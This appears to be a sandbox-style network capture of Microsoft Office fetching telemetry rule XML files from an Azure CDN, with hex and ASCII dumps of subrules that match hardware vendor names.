2024-11-07 03:13:04 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	49798	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:04 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:04 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:04 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: e92242f2-701e-005c-7858-2ebb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031304Z-17df447cdb54qlp6hC1DFWqcfc00000003qg00000000ds8a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:04 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	49800	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:05 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:05 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:05 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 11f32c1c-b01e-003d-4c5c-2ed32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031305Z-15869dbbcc6sg5zbhC1DFWzt6c000000013g000000007n28 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:05 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	49801	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:05 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:05 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:05 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: 2173f510-c01e-000b-3b58-2ee255000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031305Z-15869dbbcc62nmdhhC1DFWg2r400000000wg000000003g8m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:05 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49802	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:05 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:05 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:05 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: 2e6eb393-601e-0097-4b00-2df33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031305Z-16547b76f7fr4g8xhC1DFW9cqc00000006pg00000000meqf x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:05 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49803	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:05 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:05 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:05 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 886cc861-d01e-0049-60f4-2ee7dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031305Z-17df447cdb57g7m7hC1DFW791s00000003sg0000000084vy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:05 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49804	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:05 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:05 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:05 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 23aea2f2-001e-0065-4c65-2e0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031305Z-15869dbbcc662ldwhC1DFWbd5g000000012g000000006kvw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:05 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49805	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:06 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:06 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:06 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: b9c7c7ae-801e-00a0-1255-2e2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031306Z-17df447cdb5w28bthC1DFWgb6400000003k000000000au5f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:06 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49806	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:06 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:06 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:06 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 3fd26caf-a01e-0032-3d02-2d1949000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031306Z-16547b76f7fkcrm9hC1DFWxdag00000007r0000000005qga x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:06 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49808	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:06 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:06 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:06 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 959a3585-901e-0067-5ae9-2eb5cb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031306Z-17df447cdb5km9skhC1DFWy2rc00000003u000000000pdq0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:06 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	49807	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:06 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:06 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:06 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 32d5e889-e01e-0099-1f00-2dda8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031306Z-16547b76f7f76p6chC1DFWctqw00000007q000000000985x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:06 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	49809	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:06 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:06 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:06 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: ac6bbd40-501e-007b-3e0c-2d5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031306Z-16547b76f7frbg6bhC1DFWr54000000007bg00000000sfmu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:06 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	49811	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:07 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
